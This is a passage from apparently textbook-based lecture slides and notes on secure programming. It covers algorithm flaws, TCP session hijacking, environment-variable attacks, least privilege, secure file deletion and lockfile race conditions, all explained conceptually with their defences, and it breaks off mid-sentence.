Disadvantage is that bugs triggered by other forms of input would be missed

Combination of approaches is needed for reasonably comprehensive coverage of the inputs

Writing Safe Program Code

Second component is processing of data by some algorithm to solve required problem

High-level languages are typically compiled and linked into machine code which is then directly executed by the target processor

24

The second component of our model of computer programs is the processing of

the input data according to some algorithm. For procedural languages like C and

its descendents, this algorithm specifies the series of steps taken to manipulate the

input to solve the required problem. High-level languages are typically compiled

and linked into machine code, which is then directly executed by the target processor.

In Section 10.1 we discuss the typical process structure used by executing

programs. Alternatively, a high-level language such as Java may be compiled into

an intermediate language that is then interpreted by a suitable program on the

target system. The same may be done for programs written using an interpreted

scripting language. In all cases the execution of a program involves the execution of

machine language instructions by a processor to implement the desired algorithm.

These instructions will manipulate data stored in various regions of memory and in

the processor’s registers.

From a software security perspective, the key issues are whether the implemented

algorithm correctly solves the specified problem, whether the machine

instructions executed correctly represent the high-level algorithm specification, and

whether the manipulation of data values in variables, as stored in machine registers

or memory, is valid and meaningful.

Security issues:

Correct algorithm implementation

Correct machine instructions for algorithm

Valid manipulation of data

Correct Algorithm Implementation

25

The first issue is primarily one of good program development technique. The

algorithm may not correctly implement all cases or variants of the problem. This

might allow some seemingly legitimate program input to trigger program behavior

that was not intended, providing an attacker with additional capabilities. While this

may be an issue of inappropriate interpretation or handling of program input, as

we discuss in Section 11.2 , it may also be inappropriate handling of what should be

valid input. The consequence of such a deficiency in the design or implementation

of the algorithm is a bug in the resulting program that could be exploited.

A good example of this was the bug in some early releases of the Netscape Web

browser. Their implementation of the random number generator used to generate

session keys for secure Web connections was inadequate [GOWA01]. The assumption

was that these numbers should be unguessable, short of trying all alternatives.

However, due to a poor choice of the information used to seed this algorithm, the

resulting numbers were relatively easy to predict. As a consequence, it was possible

for an attacker to guess the key used and then decrypt the data exchanged over a

secure Web session. This flaw was fixed by reimplementing the random number

generator to ensure that it was seeded with sufficient unpredictable information

that it was not possible for an attacker to guess its output.

Another well-known example is the TCP session spoof or hijack attack. This

extends the concept we discussed in Section 7.1 of sending source spoofed packets

to a TCP server. In this attack, the goal is not to leave the server with half-open

connections, but rather to fool it into accepting packets using a spoofed source

address that belongs to a trusted host but actually originates on the attacker’s system.

If the attack succeeded, the server could be convinced to run commands or

provide access to data allowed for a trusted peer, but not generally. To understand

the requirements for this attack, consider the TCP three-way connection handshake

illustrated in Figure 7.2 . Recall that because a spoofed source address is used,

the response from the server will not be seen by the attacker, who will not therefore

know the initial sequence number provided by the server. However, if the attacker

can correctly guess this number, a suitable ACK packet can be constructed and sent

to the server, which then assumes that the connection is established. Any subsequent

data packet is treated by the server as coming from the trusted source, with

the rights assigned to it. The hijack variant of this attack waits until some authorized

external user connects and logs in to the server. Then the attacker attempts

to guess the sequence numbers used and to inject packets with spoofed details to

mimic the next packets the server expects to see from the authorized user. If the

attacker guesses correctly, then the server responds to any requests using the access

rights and permissions of the authorized user. There is an additional complexity to

these attacks. Any responses from the server are sent to the system whose address

is being spoofed. Because they acknowledge packets this system has not sent,

the system will assume there is a network error and send a reset (RST) packet to

terminate the connection. The attacker must ensure that the attack packets reach

the server and are processed before this can occur. This may be achieved by launching

a denial-of-service attack on the spoofed system while simultaneously attacking

the target server.

The implementation flaw that permits these attacks is that the initial sequence

numbers used by many TCP/IP implementations are far too predictable. In addition,

the sequence number is used to identify all packets belonging to a particular session.

The TCP standard specifies that a new, different sequence number should be used

for each connection so that packets from previous connections can be distinguished.

Potentially this could be a random number (subject to certain constraints). However,

many implementations used a highly predictable algorithm to generate the next initial

sequence number. The combination of the implied use of the sequence number as an

identifier and authenticator of packets belonging to a specific TCP session and the

failure to make them sufficiently unpredictable enables the attack to occur. A number

of recent operating system releases now support truly randomized initial sequence

numbers. Such systems are immune to these types of attacks.

Another variant of this issue is when the programmers deliberately include

additional code in a program to help test and debug it. While this valid during

program development, all too often this code remains in production releases of a

program. At the very least, this code could inappropriately release information to a

user of the program. At worst, it may permit a user to bypass security checks or other

program limitations and perform actions they would not otherwise be allowed to

perform. This type of vulnerability was seen in the sendmail mail delivery program

in the late 1980s and famously exploited by the Morris Internet Worm. The implementers

of sendmail had left in support for a DEBUG command that allowed the

user to remotely query and control the running program [SPAF89]. The Worm used

this feature to infect systems running versions of sendmail with this vulnerability.

The problem was aggravated because the sendmail program ran using superuser

privileges and hence had unlimited access to change the system. We discuss the issue

of minimizing privileges further in Section 11.4 .

A further example concerns the implementation of an interpreter for a highor

intermediate-level languages. The assumption is that the interpreter correctly

implements the specified program code. Failure to adequately reflect the language

semantics could result in bugs that an attacker might exploit. This was clearly seen

when some early implementations of the Java Virtual Machine (JVM) inadequately

implemented the security checks specified for remotely sourced code, such as in

applets [DEFW96]. These implementations permitted an attacker to introduce code

remotely, such as on a Web page, but trick the JVM interpreter into treating them

as locally sourced and hence trusted code with much greater access to the local

system and data.

 These examples illustrate the care that is needed when designing and implementing

a program. It is important to specify assumptions carefully, such as that generated

random number should indeed be unpredictable, in order to ensure that these

assumptions are satisfied by the resulting program code. Traditionally these specifications

and checks are handled informally, as design goals and code comments. An

alternative is the use of formal methods in software development and analysis that

ensures the software is correct by construction. Such approaches have been known

for many years, but have also been considered too complex and difficult for general

use. One area where they have been used is in the development of trusted computing

systems, as we will discuss in Chapter 27. However, NISTIR 8151 notes that this

is changing,and encourages their further development and more widespread use. It

is also very important to identify debugging and testing extensions to the program

and to ensure that they are removed or disabled before the program is distributed

and used.

Issue of good program development technique

Algorithm may not correctly handle all problem variants

Consequence of deficiency is a bug in the resulting program that could be exploited

Initial sequence numbers used by many TCP/IP implementations are too predictable

Combination of the sequence number as an identifier and authenticator of packets and the failure to make them sufficiently unpredictable enables the attack to occur

Another variant is when the programmers deliberately include additional code in a program to help test and debug it

Often code remains in production release of a program and could inappropriately release information

May permit a user to bypass security checks and perform actions they would not otherwise be allowed to perform

This vulnerability was exploited by the Morris Internet Worm

Ensuring Machine Language Corresponds to Algorithm

Issue is ignored by most programmers

Assumption is that the compiler or interpreter generates or executes code that validly implements the language statements

Requires comparing machine code with original source

Slow and difficult

Development of computer systems with very high assurance level is the one area where this level of checking is required

Specifically Common Criteria assurance level of EAL 7

26

The second issue concerns the correspondence between the algorithm specified in

some programming language and the machine instructions that are run to implement

it. This issue is one that is largely ignored by most programmers. The assumption

is that the compiler or interpreter does indeed generate or execute code that

validly implements the language statements. When this is considered, the issue is

typically one of efficiency, usually addressed by specifying the required level of

optimization flags to the compiler.

With compiled languages, as Ken Thompson famously noted in [THOM84], a

malicious compiler programmer could include instructions in the compiler to emit

additional code when some specific input statements were processed. These statements

could even include part of the compiler, so that these changes could be reinserted

when the compiler source code was compiled, even after all trace of them

had been removed from the compiler source. If this were done, the only evidence

of these changes would be found in the machine code. Locating this would require

careful comparison of the generated machine code with the original source. For

large programs, with many source files, this would be an exceedingly slow and difficult

task, one that, in general, is very unlikely to be done.

The development of trusted computer systems with very high assurance level

is the one area where this level of checking is required. Specifically, certification

of computer systems using a Common Criteria assurance level of EAL 7 requires

validation of the correspondence among design, source code, and object code. We

discuss this further in Chapter 27.

Correct Data Interpretation

Data stored as bits/bytes in computer

Grouped as words or longwords

Accessed and manipulated in memory or copied into processor registers before being used

Interpretation depends on machine instruction executed

Different languages provide different capabilities for restricting and validating interpretation of data in variables

Strongly typed languages are more limited, safer

Other languages allow more liberal interpretation of data and permit program code to explicitly change their interpretation

27

The next issue concerns the correct interpretation of data values. At the most basic

level, all data on a computer are stored as groups of binary bits. These are generally

saved in bytes of memory, which may be grouped together as a larger unit, such as a

word or longword value. They may be accessed and manipulated in memory, or they

may be copied into processor registers before being used.  Whether a particular group

of bits is interpreted as representing a character, an integer, a floating-point number,

a memory address (pointer), or some more complex interpretation depends on the

program operations used to manipulate it and ultimately on the specific machine

instructions executed. Different languages provide varying capabilities for restricting

and validating assumptions on the interpretation of data in variables. If the language

includes strong typing, then the operations performed on any specific type of data

will be limited to appropriate manipulations of the values.  This greatly reduces the

likelihood of inappropriate manipulation and use of variables introducing a flaw in

the program. Other languages, though, allow a much more liberal interpretation of

data and permit program code to explicitly change their interpretation. The widely

used language C has this characteristic, as we discussed in Chapter 10. In particular,

it allows easy conversion between interpreting variables as integers and interpreting

them as memory addresses (pointers). This is a consequence of the close relationship

between C language constructs and the capabilities of machine language instructions,

and it provides significant benefits for system level programming. Unfortunately, it

also allows a number of errors caused by the inappropriate manipulation and use of

pointers. The prevalence of buffer overflow issues, as we discussed in Chapter 10, is

one consequence. A related issue is the occurrence of errors due to the incorrect

manipulation of pointers in complex data structures, such as linked lists or trees,

resulting in corruption of the structure or changing of incorrect data values. Any such

programming bugs could provide a means for an attacker to subvert the correct

operation of a program or simply to cause it to crash.

The best defense against such errors is to use a strongly typed programming

language. However, even when the main program is written in such a language,

it will still access and use operating system services and standard library routines,

which are currently most likely written in languages like C, and could potentially

contain such flaws. The only counter to this is to monitor any bug reports for the

system being used and to try and not use any routines with known, serious bugs. If a

loosely typed language like C is used, then due care is needed whenever values are

cast between data types to ensure that their use remains valid.

Correct Use of Memory

Issue of dynamic memory allocation

Unknown amounts of data

Allocated when needed, released when done

Used to manipulate Memory leak

Steady reduction in memory available on the heap to the point where it is completely exhausted

Many older languages have no explicit support for dynamic memory allocation

Use standard library routines to allocate and release memory

Modern languages handle automatically

28

Related to the issue of interpretation of data values is the allocation and management

of dynamic memory storage, generally using the process heap. Many

programs, which manipulate unknown quantities of data, use dynamically allocated

memory to store data when required. This memory must be allocated when needed

and released when done. If a program fails to correctly manage this process, the

consequence may be a steady reduction in memory available on the heap to the

point where it is completely exhausted. This is known as a memory leak , and often

the program will crash once the available memory on the heap is exhausted. This

provides an obvious mechanism for an attacker to implement a denial-of-service

attack on such a program.

Many older languages, including C, provide no explicit support for dynamically

allocated memory. Instead support is provided by explicitly calling standard

library routines to allocate and release memory. Unfortunately, in large, complex

programs, determining exactly when dynamically allocated memory is no longer

required can be a difficult task. As a consequence, memory leaks in such programs

can easily occur and can be difficult to identify and correct. There are library

variants that implement much higher levels of checking and debugging such allocations

that can be used to assist this process.

Other languages like Java and C++ manage memory allocation and release

automatically. While such languages do incur an execution overhead to support this

automatic management, the resulting programs are generally far more reliable. The

use of such languages is strongly encouraged to avoid memory management problems.

Race Conditions

Without synchronization of accesses it is possible that values may be corrupted or changes lost due to overlapping access, use, and replacement of shared values

Arise when writing concurrent code whose solution requires the correct selection and use of appropriate synchronization primitives

Deadlock

Processes or threads wait on a resource held by the other

One or more programs has to be terminated

29

Another topic of concern is management of access to common, shared memory by

several processes or threads within a process. Without suitable synchronization of

accesses, it is possible that values may be corrupted, or changes lost, due to overlapping

access, use, and replacement of shared values. The resulting race condition

occurs when multiple processes and threads compete to gain uncontrolled access

to some resource. This problem is a well-known and documented issue that arises

when writing concurrent code, whose solution requires the correct selection and

use of appropriate synchronization primitives. Even so, it is neither easy nor obvious

what the most appropriate and efficient choice is. If an incorrect sequence

of synchronization primitives is chosen, it is possible for the various processes or

threads to deadlock , each waiting on a resource held by the other. There is no easy

way of recovering from this flaw without terminating one or more of the programs.

An attacker could trigger such a deadlock in a vulnerable program to implement a

denial-of-service upon it. In large complex applications, ensuring that deadlocks are

not possible can be very difficult. Care is needed to carefully design and partition

the problem to limit areas where access to shared memory is needed and to determine

the best primitives to use.

Operating System Interaction

30

The third component of our model of computer programs is that it executes on a

computer system under the control of an operating system. This aspect of a computer

program is often not emphasized in introductory programming courses; however,

from the perspective of writing secure software, it is critical. Excepting dedicated

embedded applications, in general, programs do not run in isolation on most

computer systems. Rather, they run under the control of an operating system that

mediates access to the resources of that system and shares their use between all the

currently executing programs.

The operating system constructs an execution environment for a process when

a program is run, as illustrated in Figure 10.4 . In addition to the code and data for

the program, the process includes information provided by the operating system.

These include environment variables, which may be used to tailor the operation of

the program, and any command-line arguments specified for the program. All such

data should be considered external inputs to the program whose values need validation

Before use, as we discuss in Section 11.2.

Generally these systems have a concept of multiple users on the system.

Resources, like files and devices, are owned by a user and have permissions granting

access with various rights to different categories of users. We discussed these concepts

in detail in Chapter 4. From the perspective of software security, programs need

access to the various resources, such as files and devices, they use. Unless appropriate

access is granted, these programs will likely fail. However, excessive levels of access

are also dangerous because any bug in the program could then potentially compromise

more of the system.

There are also concerns when multiple programs access shared resources, such

as a common file. This is a generalization of the problem of managing access to shared

memory, which we discussed in Section 11.3. Many of the same concerns apply, and

appropriate synchronization mechanisms are needed.

Programs execute on systems under the control of an operating system

Mediates and shares access to resources

Constructs execution environment

Includes environment variables and arguments

Systems have a concept of multiple users

Resources are owned by a user and have permissions granting access with various rights to different categories of users

Programs need access to various resources, however excessive levels of access are dangerous

Concerns when multiple programs access shared resources such as a common file

Environment Variables

31

Environment variables are a collection of string values inherited by each process

from its parent that can affect the way a running process behaves. The operating system

includes these in the process’s memory when it is constructed. By default, they

are a copy of the parent’s environment variables. However, the request to execute a

new program can specify a new collection of values to use instead. A program can

modify the environment variables in its process at any time, and these in turn will be

passed to its children. Some environment variable names are well known and used

by many programs and the operating system. Others may be custom to a specific

program. Environment variables are used on a wide variety of operating systems,

including all UNIX variants, DOS and Microsoft Windows systems, and others.

Well-known environment variables include the variable PATH, which specifies

the set of directories to search for any given command; IFS, which specifies the

word boundaries in a shell script; and LD_LIBRARY_PATH, which specifies the list of

directories to search for dynamically loadable libraries. All of these have been used

to attack programs.

The security concern for a program is that these provide another path for

untrusted data to enter a program and hence need to be validated. The most common

use of these variables in an attack is by a local user on some system attempting

to gain increased privileges on the system. The goal is to subvert a program that

grants superuser or administrator privileges, coercing it to run code of the attacker’s

selection with these higher privileges.

Collection of string values inherited by each process from its parent

Can affect the way a running process behaves

Included in memory when it is constructed

Can be modified by the program process at any time

Modifications will be passed to its children

Another source of untrusted program input

Most common use is by a local user attempting to gain increased privileges

Goal is to subvert a program that grants superuser or administrator privileges

32

Some of the earliest attacks using environment variables targeted shell scripts

that executed with the privileges of their owner rather than the user running them.

Consider the simple example script shown in Figure 11.6a . This script, which might

be used by an ISP, takes the identity of some user, strips any domain specification if

included, and then retrieves the mapping for that user to an IP address. Because that

information is held in a directory of privileged user accounting information, general

access to that directory is not granted. Instead the script is run with the privileges

of its owner, which does have access to the relevant directory. This type of simple

utility script is very common on many systems. However, it contains a number of

serious flaws. The first concerns the interaction with the PATH environment variable.

This simple script calls two separate programs: sed and grep. The programmer

assumes that the standard system versions of these scripts would be called. But

they are specified just by their filename. To locate the actual program, the shell will

search each directory named in the PATH variable for a file with the desired name.

The attacker simply has to redefine the PATH variable to include a directory they

control, which contains a program called grep, for example. Then when this script

is run, the attacker’s grep program is called instead of the standard system version.

This program can do whatever the attacker desires, with the privileges granted to the

shell script. To address this vulnerability the script could be rewritten to use absolute

names for each program. This avoids the use of the PATH variable, though at a cost

in readability and portability. Alternatively, the PATH variable could be reset to a

known default value by the script, as shown in Figure 11.6b . Unfortunately, this version

of the script is still vulnerable, this time due to the IFS variable. This is used

to separate the words that form a line of commands. It defaults to a space, tab, or

newline character. However, it can be set to any sequence of characters. Consider

the effect of including the “=” character in this set. Then the assignment of a new

value to the PATH variable is interpreted as a command to execute the program

PATH with the list of directories as its argument. If the attacker has also changed the

PATH variable to include a directory with an attack program PATH, then this will be

executed when the script is run. It is essentially impossible to prevent this form of

attack on a shell script. In the worst case, if the script executes as the root user, then

total compromise of the system is possible. Some recent UNIX systems do block

the setting of critical environment variables such as these for programs executing as

root. However, that does not prevent attacks on programs running as other users,

possibly with greater access to the system.

It is generally recognized that writing secure, privileged shell scripts is very

difficult. Hence their use is strongly discouraged. At best, the recommendation is

to change only the group, rather than user, identity and to reset all critical environment

variables. This at least ensures the attack cannot gain superuser privileges.

If a scripted application is needed, the best solution is to use a compiled wrapper

program to call it. The change of owner or group is done using the compiled

program, which then constructs a suitably safe set of environment variables before

calling the desired script. Correctly implemented, this provides a safe mechanism

for executing such scripts. A very good example of this approach is the use of the

suexec wrapper program by the Apache Web server to execute user CGI scripts.

The wrapper program performs a rigorous set of security checks before constructing

a safe environment and running the specified script.

Vulnerable Compiled Programs

33

Even if a compiled program is run with elevated privileges, it may still be

vulnerable to attacks using environment variables. If this program executes another

program, depending on the command used to do this, the PATH variable may still

be used to locate it. Hence any such program must reset this to known safe values

first. This at least can be done securely. However, there are other vulnerabilities.

Essentially all programs on modern computer systems use functionality provided

by standard library routines. When the program is compiled and linked, the code

for these standard libraries could be included in the executable program file. This

is known as a static link. With the use of static links every program loads its own

copy of these standard libraries into the computer’s memory. This is wasteful, as

all these copies of code are identical. Hence most modern systems support the

concept of dynamic linking. A dynamically linked executable program does not

include the code for common libraries, but rather has a table of names and pointers

to all the functions it needs to use. When the program is loaded into a process, this

table is resolved to reference a single copy of any library, shared by all processes

needing it on the system. However, there are reasons why different programs may

need different versions of libraries with the same name. Hence there is usually

a way to specify a list of directories to search for dynamically loaded libraries.

On many UNIX systems this is the LD_LIBRARY_PATH environment variable. Its

use does provide a degree of flexibility with dynamic libraries. But again it also

introduces a possible mechanism for attack. The attacker constructs a custom version

of a common library, placing the desired attack code in a function known

to be used by some target, dynamically linked program. Then by setting the

LD_LIBRARY_PATH variable to reference the attacker’s copy of the library first,

when the target program is run and calls the known function, the attacker’s code is

run with the privileges of the target program. To prevent this type of attack, a statically

linked executable can be used, at a cost of memory efficiency. Alternatively,

again some modern operating systems block the use of this environment variable

when the program executed runs with different privileges.

 Lastly, apart from the standard environment variables, many programs use

custom variables to permit users to generically change their behavior just by setting

appropriate values for these variables in their startup scripts. Again, such use means

these variables constitute untrusted input to the program that needs to be validated.

One particular danger is to merge values from such a variable with other information

into some buffer. Unless due care is taken, a buffer overflow can occur, with

consequences as we discussed in Chapter 10. Alternatively, any of the issues with

correct interpretation of textual information we discussed in Section

11.2 could also apply.

All of these examples illustrate how care is needed to identify the way in which

a program interacts with the system in which it executes and to carefully consider

the security implications of these assumptions.

Programs can be vulnerable to PATH variable manipulation

Must reset to “safe” values

If dynamically linked may be vulnerable to manipulation of LD_LIBRARY_PATH

Used to locate suitable dynamic library

Must either statically link privileged programs or prevent use of this variable

Use of Least Privilege

34

The consequence of many of the program flaws we discuss in both this chapter and

Chapter 10 is that the attacker is able to execute code with the privileges and access

rights of the compromised program or service. If these privileges are greater than

those available already to the attacker, then this results in a privilege escalation , an

important stage in the overall attack process. Using the higher levels of privilege

may enable the attacker to make changes to the system, ensuring future use of these

greater capabilities. This strongly suggests that programs should execute with the

least amount of privileges needed to complete their function. This is known as the

principle of least privilege and is widely recognized as a desirable characteristic in a

secure program.

Normally when a user runs a program, it executes with the same privileges and

access rights as that user. Exploiting flaws in such a program does not benefit an

attacker in relation to privileges, although the attacker may have other goals, such as

a denial-of-service attack on the program. However, there are many circumstances

when a program needs to utilize resources to which the user is not normally granted

access. This may be to provide a finer granularity of access control than the standard

system mechanisms support. A common practice is to use a special system login for

a service and make all files and directories used by the service assessable only to that

login. Any program used to implement the service runs using the access rights of this

system user and is regarded as a privileged program. Different operating systems

provide different mechanisms to support this concept. UNIX systems use the set

user or set group options. The access control lists used in Windows systems provide a

means to specify alternate owner or group access rights if desired. We discussed such

access control concepts elaborately in Chapter 4.

Whenever a privileged program runs, care must be taken to determine the

appropriate user and group privileges required. Any such program is a potential

target for an attacker to acquire additional privileges, as we noted in the discussion

of concerns regarding environment variables and privileged shell scripts. One key

decision involves whether to grant additional user or just group privileges. Where

appropriate the latter is generally preferred. This is because on UNIX and related

systems, any file created will have the user running the program as the file’s owner,

enabling users to be more easily identified. If additional special user privileges

are granted, this special user is the owner of any new files, masking the identity of

the user running the program. However, there are circumstances when providing

privileged group access is not sufficient. In those cases care is needed to manage,

and log if necessary, use of these programs.

Another concern is ensuring that any privileged program can modify only those

files and directories necessary. A common deficiency found with many privileged

programs is for them to have ownership of all associated files and directories. If the

program is then compromised, the attacker then has greater scope for modifying and

corrupting the system. This violates the principle of least privilege. A very common

example of this poor practice is seen in the configuration of many Web servers and

their document directories. On most systems the Web server runs with the privilege

of a special user, commonly www or similar. Generally the Web server only needs

the ability to read files it is serving. The only files it needs write access to are those

used to store information provided by CGI scripts, file uploads, and the like. All

other files should have write access to the group of users managing them, but not

the Web server. However, common practice by system managers with insufficient

security awareness is to assign the ownership of most files in the Web document

hierarchy to the Web server. Consequently, should the Web server be compromised,

the attacker can then change most of the files. The widespread occurrence of Web

defacement attacks is a direct consequence of this practice. The server is typically

compromised by an attack like the PHP remote code injection attack we discuss in

Section 11.2 . This allows the attacker to run any PHP code of their choice with the

privileges of the Web server. The attacker may then replace any pages the server has

write access to. The result is almost certain embarrassment for the organization. If

the attacker accesses or modifies form data saved by previous CGI script users, then

more serious consequences can result.

Care is needed to assign the correct file and group ownerships to files and

directories managed by privileged programs. Problems can manifest particularly

when a program is moved from one computer system to another or when there

is a major upgrade of the operating system. The new system might use different

defaults for such users and groups. If all affected programs, files, and directories are

not correctly updated, then either the service will fail to function as desired or worse

may have access to files it should not, which may result in corruption of files. Again

this may be seen in moving a Web server to a newer, different system, where the

Web server user might change from www to www-data. The affected files may not

just be those in the main Web server document hierarchy but may also include files

in users’ public Web directories.

Privilege escalation

Exploit of flaws may give attacker greater privileges

Least privilege

Run programs with least privilege needed to complete their function

Determine appropriate user and group privileges required

Decide whether to grant extra user or just group privileges

Ensure that privileged program can modify only those files and directories necessary

Root/Administrator Privileges

35

The greatest concerns with privileged programs occur when such programs

execute with root or administrator privileges. These provide very high levels of

access and control to the system. Acquiring such privileges is typically the major

goal of an attacker on any system. Hence any such privileged program is a key

target. The principle of least privilege indicates that such access should be granted

as rarely and as briefly as possible. Unfortunately, due to the design of operating

systems and the need to restrict access to underlying system resources, there are

circumstances when such access must be granted. Classic examples include the

programs used to allow a user to login or to change passwords on a system; such

programs are only accessible to the root user. Another common example is network

servers that need to bind to a privileged service port. These include Web, Secure

Shell (SSH), SMTP mail delivery, DNS, and many other servers. Traditionally, such

server programs executed with root privileges for the entire time they were running.

Closer inspection of the privilege requirements reveals that they only need

root privileges to initially bind to the desired privileged port. Once this is done

the server programs could reduce their user privileges to those of another special

system user. Any subsequent attack is then much less significant. The problems

resulting from the numerous security bugs in the once widely used sendmail mail

delivery program are a direct consequence of it being a large, complex monolithic

program that ran continuously as the root user.

We now recognize that good defensive program design requires that large,

complex programs be partitioned into smaller modules, each granted the privileges

they require, only for as long as they need them. This form of program modularization

provides a greater degree of isolation between the components, reducing the

consequences of a security breach in one component. In addition, being smaller,

each component module is easier to test and verify. Ideally the few components that

require elevated privileges can be kept small and subject to much greater scrutiny

than the remainder of the program. The popularity of the postfix mail delivery

program, now widely replacing the use of sendmail in many organizations, is

partly due to its adoption of these more secure design guidelines.

 A further technique to minimize privilege is to run potentially vulnerable

programs in some form of sandbox that provides greater isolation and control of

the executing program from the wider system. The runtime for code written in languages

such as Java includes this type of functionality. Alternatively, UNIX-related

systems provide the chroot  system function to limit a program’s view of the file

system to just one carefully configured and isolated section of the file system. This

is known as a chroot jail. Provided this is configured correctly, even if the program

is compromised, it may only access or modify files in the chroot jail section of the

file system. Unfortunately, correct configuration of a chroot jail is difficult. If created

incorrectly, the program may either fail to run correctly or worse may still be able

to interact with files outside the jail. While the use of a chroot jail can significantly

limit the consequences of compromise, it is not suitable for all circumstances, and

nor is it a complete security solution. A further recently developed alternative for

this is the use of containers, also known as application virtualization, which we will

discuss in Section 12.8.

Programs with root/ administrator privileges are a major target of attackers

They provide highest levels of system access and control

Are needed to manage access to protected system resources

Often privilege is only needed at start

Can then run as normal user

Good design partitions complex programs in smaller modules with needed privileges

Provides a greater degree of isolation between the components

Reduces the consequences of a security breach in one component

Easier to test and verify

System Calls and Standard Library Functions

36

Except on very small, embedded systems, no computer program contains all of

the code it needs to execute. Rather, programs make calls to the operating system

to access the system’s resources and to standard library functions to perform

common operations. When using such functions, programmers commonly make

assumptions about how they actually operate. Most of the time they do indeed

seem to perform as expected. However, there are circumstances when the assumptions

a programmer makes about these functions are not correct. The result can

be that the program does not perform as expected. Part of the reason for this is

that programmers tend to focus on the particular program they are developing and

view it in isolation. However, on most systems this program will simply be one of

many running and sharing the available system resources. The operating system

and library functions attempt to manage their resources in a manner that provides

the best performance to all the programs running on the system. This does

result in requests for services being buffered, resequenced, or otherwise modified

to optimize system use. Unfortunately, there are times when these optimizations

conflict with the goals of the program. Unless the programmer is aware of these

interactions and explicitly codes for them, the resulting program may not perform

as expected.

Programs use system calls and standard library functions for common operations

Programmers make assumptions about their operation

If incorrect behavior is not what is expected

May be a result of system optimizing access to shared resources

Results in requests for services being buffered, resequenced, or otherwise modified to optimize system use

Optimizations can conflict with program goals

37

An excellent illustration of these issues is given by Venema in his discussion

of the design of a secure file shredding program [VENE06]. The problem is how

to securely delete a file so that its contents cannot subsequently be recovered. Just

using the standard file delete utility or system call does not suffice, as this simply

removes the linkage between the file’s name and its contents. The contents still

exist on the disk until those blocks are eventually reused in another file. Reversing

this operation is relatively straightforward, and undelete programs have existed

for many years to do this. Even when blocks from a deleted file are reused, the

data in the files can still be recovered because not all traces of the previous bit

values are removed [GUTM96]. Consequently, the standard recommendation is

to repeatedly overwrite the data contents with several distinct bit patterns to minimize

the likelihood of the original data being recovered. Hence a secure file shredding

program might perhaps implement the algorithm like that shown in Figure

11.7a . However, when an obvious implementation of this algorithm is tried, the

file contents were still recoverable afterwards. Venema details a number of flaws

in this algorithm that mean the program does not behave as expected. These flaws

relate to incorrect assumptions about how the relevant system functions operate

and include the following:

When the file is opened for writing, the system will write the new data to

same disk blocks as the original data. In practice, the operating system may

well assume that the existing data are no longer required, remove them from

association with the file, and then allocate new unused blocks to write the data

to. What the program should do is open the file for update, indicating to the

operating system that the existing data are still required.

• When the file is overwritten with pattern, the data are written immediately

to disk. In the first instance the data are copied into a buffer in the application,

managed by the standard library file I/O routines. These routines delay

writing this buffer until it is sufficiently full, the program flushes the buffer,

or the file is closed. If the file is relatively small, this buffer may never fill up

before the program loops round, seeks back to the start of the file, and writes

the next pattern. In such a case the library code will decide that because the

previously written data have changed, there is no need to write the data to

disk. The program needs to explicitly insist that the buffer be flushed after

each pattern is written.

• When the I/O buffers are flushed and the file is closed, the data are then written

to disk. However, there is another layer of buffering in the operating system’s

file handling code. This layer buffers information being read from and written

to files by all of the processes currently running on the computer system. It

then reorders and schedules these data for reading and writing to make the

most efficient use of physical device accesses. Even if the program flushes the

data out of the application buffer into the file system buffer, the data will not

be immediately written. If new replacement data are flushed from the program,

again they will most likely replace the previous data and not be written to disk,

because the file system code will assume that the earlier values are no longer

required. The program must insist that the file system synchronize the data

with the values on the device in order to ensure that the data are physically

transferred to the device. However, doing this results in a performance penalty

on the system because it forces device accesses to occur at less than optimal

times. This penalty impacts not just this file shredding program but every

program currently running on the system.

With these changes, the algorithm for a secure file shredding program changes

to that shown in Figure 11.7b . This is certainly more likely to achieve the desired

result; however, examined more closely, there are yet more concerns.

Modern disk drives and other storage devices are managed by smart controllers,

which are dedicated processors with their own memory. When the operating

system transfers data to such a device, the data are stored in buffers in the controller’s

memory. The controller also attempts to optimize the sequence of transfers

to the actual device. If it detects that the same data block is being written multiple

times, the controller may discard the earlier data values. To prevent this the program

needs some way to command the controller to write all pending data. Unfortunately,

there is no standard mechanism on most operating systems to make such a request.

When Apple was developing its Mac OS secure file delete program, it found it

necessary to create an additional file control option to generate this command. And

its use incurs a further performance penalty on the system. But there are still more

problems. If the device is a nonmagnetic disk (e.g., a flash memory drive),

then their controllers try to minimize the number of writes to any block. This is

because such devices only support a limited number of rewrites to any block. Instead

they may allocate new blocks when data are rewritten instead of reusing the existing

block. Also, some types of journaling file systems keep records of all changes made

to files to enable fast recovery after a disk crash. But these records can be used to

access previous data contents.

All of this indicates that writing a secure file shredding program is actually

an extremely difficult exercise. There are so many layers of code involved, each of

which makes assumptions about what the program really requires in order to provide

the best performance. When these assumptions conflict with the actual goals

of the program, the result is that the program fails to perform as expected. A secure

programmer needs to identify such assumptions and resolve any conflicts with the

program goals. Because identifying all relevant assumptions may be very difficult,

it also means exhaustively testing the program to ensure that it does indeed behave

as expected. When it does not, the reasons should be determined and the invalid

assumptions identified and corrected.

Venema concludes his discussion by noting that in fact the program may actually

be solving the wrong problem. Rather than trying to destroy the file contents

before deletion, a better approach may in fact be to overwrite all currently unused

blocks in the file systems and swap space, including those recently released from

deleted files.

Preventing Race Conditions

Programs may need to access a common system resource

Need suitable synchronization mechanisms

Most common technique is to acquire a lock on the shared file

Lockfile

Process must create and own the lockfile in order to gain access to the shared resource

Concerns

If a program chooses to ignore the existence of the lockfile and access the shared resource the system will not prevent this

All programs using this form of synchronization must cooperate

Implementation

38

There are circumstances in which multiple programs need to access a common

system resource, often a file containing data created and manipulated by multiple

programs. Examples include mail client and mail delivery programs sharing access

to a user’s mailbox file, or various users of a Web CGI script updating the same

file used to save submitted form values. This is a variant of the issue, discussed in

Section 11.3 —synchronizing access to shared memory. As in that case, the solution

is to use an appropriate synchronization mechanism to serialize the accesses

to prevent errors. The most common technique is to acquire a lock on the shared

file, ensuring that each process has appropriate access in turn. There are several

methods used for this, depending on the operating system in use.

The oldest and most general technique is to use a lockfile . A process must

create and own the lockfile in order to gain access to the shared resource. Any other

process that detects the existence of a lockfile must wait until it is removed before

creating its own to gain access. There are several concerns with this approach. First,

it is purely advisory. If a program chooses to ignore the existence of the lockfile

and access the shared resource, then the system will not prevent this. All programs

using this form of synchronization must cooperate. A more serious flaw occurs in

the implementation. The obvious implementation is first to check that the lockfile

does not exist and then create it. Unfortunately, this contains a fatal deficiency.

Consider two processes each attempting to check and create this lockfile. The first

checks and determines that the lockfile does not exist. However, before it is able

to create the lockfile, the system suspends the process to allow other processes to

run. At this point the second process also checks that the lockfile does not exist,

creates it, and proceeds to start using the shared resource. Then it is suspended and

control returns to the first process, which proceeds to also create the lockfile and

